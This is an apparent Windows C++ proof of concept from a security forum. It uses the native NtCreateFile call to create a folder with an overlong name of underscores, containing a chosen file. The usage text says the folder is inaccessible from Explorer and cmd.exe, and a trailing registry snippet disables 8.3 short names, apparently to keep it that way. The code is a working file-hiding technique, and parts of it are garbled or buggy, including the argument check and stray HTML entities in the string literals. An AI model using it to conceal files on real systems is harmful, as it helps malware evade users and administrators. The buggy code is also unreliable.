#define UNICODE
#include "windows.h"
#include <iostream>

#pragma comment(lib,"C:\\WINDDK\\DDK_WI~1\\lib\\wxp\\i386\\ntdll.lib")
#pragma comment(lib,"C:\\WINDDK\\DDK_WI~1\\lib\\wxp\\i386\\ntoskrnl.lib")

typedef LONG NTSTATUS;
typedef struct _UNICODE_STRING {
   USHORT Length;
   USHORT MaximumLength;
#ifdef MIDL_PASS
   [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
   PWSTR  Buffer;
#endif // MIDL_PASS
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
   ULONG Length;
   HANDLE RootDirectory;
   PUNICODE_STRING ObjectName;
   ULONG Attributes;
   PVOID SecurityDescriptor;        // Points to type SECURITY_DESCRIPTOR
   PVOID SecurityQualityOfService;  // Points to type SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;

typedef struct _IO_STATUS_BLOCK {
   union {
       NTSTATUS Status;
       PVOID Pointer;
   };

   ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

extern "C" NTSTATUS __stdcall
NtCreateFile(
   OUT PHANDLE FileHandle,
   IN ACCESS_MASK DesiredAccess,
   IN POBJECT_ATTRIBUTES ObjectAttributes,
   OUT PIO_STATUS_BLOCK IoStatusBlock,
   IN PLARGE_INTEGER AllocationSize OPTIONAL,
   IN ULONG FileAttributes,
   IN ULONG ShareAccess,
   IN ULONG CreateDisposition,
   IN ULONG CreateOptions,
   IN PVOID EaBuffer OPTIONAL,
   IN ULONG EaLength
   );

extern "C" void __stdcall
 RtlInitUnicodeString(
   IN OUT PUNICODE_STRING  DestinationString,
   IN PCWSTR  SourceString
   );
extern "C" void __stdcall
RtlFreeUnicodeString(
   IN PUNICODE_STRING  UnicodeString
   );

extern "C" NTSTATUS __stdcall
 NtClose(
   IN HANDLE  Handle
   );

#define InitializeObjectAttributes( p, n, a, r, s ) { \
   (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
   (p)->RootDirectory = r;                             \
   (p)->Attributes = a;                                \
   (p)->ObjectName = n;                                \
   (p)->SecurityDescriptor = s;                        \
   (p)->SecurityQualityOfService = NULL;               \
   }

#define OBJ_CASE_INSENSITIVE    0x00000040L
#define FILE_NON_DIRECTORY_FILE                 0x00000040
#define FILE_ATTRIBUTE_VALID_FLAGS          0x00007fb7
#define OBJ_KERNEL_HANDLE       0x00000200L
#define FILE_SUPERSEDE                  0x00000000
#define FILE_DIRECTORY_FILE                     0x00000001
#define FILE_CREATE                     0x00000002

void CreateUnicode(PUNICODE_STRING pString, wchar_t* pText)
{
RtlInitUnicodeString(pString, pText);

return;
}

int main(int argc, char* argv[])
{
if(strcmp(argv[0], "create") && argc == 3)
{
 // get current folder
 char temp;
 DWORD requiredLength = GetCurrentDirectoryA(1, &temp);
 char* buffer = new char[requiredLength];
 DWORD didItWork = GetCurrentDirectoryA(requiredLength, buffer);
 strupr(buffer);

 // make a folder inside current location
 std::string strTempDir;
 strTempDir.insert(0,"\& #092;___________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
__________________\\");
 strTempDir.insert(0,buffer);
 strTempDir.insert(0,"\\DosDevices\\");
 const char* strbufferDir = strTempDir.c_str();

 size_t lenDir = strlen(strbufferDir)+1;
 wchar_t* wideStringDir = new wchar_t[lenDir];
 size_t numConvertedDir = mbstowcs(wideStringDir, strbufferDir, lenDir);


 std::string strTempFile = std::string(argv[2]);
 strTempFile.insert(0,"\& #092;___________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
__________________\\");
 strTempFile.insert(0,buffer);
 strTempFile.insert(0,"\\DosDevices\\");
 const char* strbufferFile = strTempFile.c_str();

 size_t lenFile = strlen(strbufferFile)+1;
 wchar_t* wideStringFile = new wchar_t[lenFile];
 size_t numConvertedFile = mbstowcs(wideStringFile, strbufferFile, lenFile);


 UNICODE_STRING dirUniStr;
 RtlInitUnicodeString(&dirUniStr, wideStringDir);

 UNICODE_STRING fileUniStr;
 RtlInitUnicodeString(&fileUniStr, wideStringFile);

 OBJECT_ATTRIBUTES ObjectAttributesDir;
 IO_STATUS_BLOCK IoStatusBlockDir;
 NTSTATUS StatusDir;

 OBJECT_ATTRIBUTES ObjectAttributesFile;
 IO_STATUS_BLOCK IoStatusBlockFile;
 NTSTATUS StatusFile;

 InitializeObjectAttributes(&ObjectAttributesDir,
       &dirUniStr,
       OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
       NULL,
       NULL );

 InitializeObjectAttributes(&ObjectAttributesFile,
       &fileUniStr,
       OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
       NULL,
       NULL );

 HANDLE hDir;
 HANDLE hFile;

 StatusDir = NtCreateFile(&hDir,
      DELETE,
      &ObjectAttributesDir,
      &IoStatusBlockDir,
      NULL,
      FILE_ATTRIBUTE_NORMAL,
      FILE_SHARE_READ,
      FILE_CREATE,
      FILE_DIRECTORY_FILE,
      NULL,
      0);

 StatusFile = NtCreateFile(&hFile,
      DELETE,
      &ObjectAttributesFile,
      &IoStatusBlockFile,
      NULL,
      FILE_ATTRIBUTE_NORMAL,
      FILE_SHARE_READ,
      FILE_SUPERSEDE,// for directories->FILE_CREATE, // for files-> FILE_SUPERSEDE,
      FILE_NON_DIRECTORY_FILE,//FILE_DIRECTORY_FILE,//FILE_NON_DIRECTORY_FILE,
      NULL,
      0);

 NtClose(hFile);
 NtClose(hDir);

 delete wideStringDir, wideStringFile;

 printf("long file created...");
}
else
{
 printf("Usage createLongFile.exe create filename\n");
 printf("This will create a long directory named ___... in current folder\n");
 printf("With a file inside it called \"filename\"\n");
 printf("This folder will be inaccessible from both explorer and cmd.exe\n");
 printf("POC by tibbar@governmentsecurity.org");
}

return 0;
}

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisable8dot3NameCreation"=dword:00000001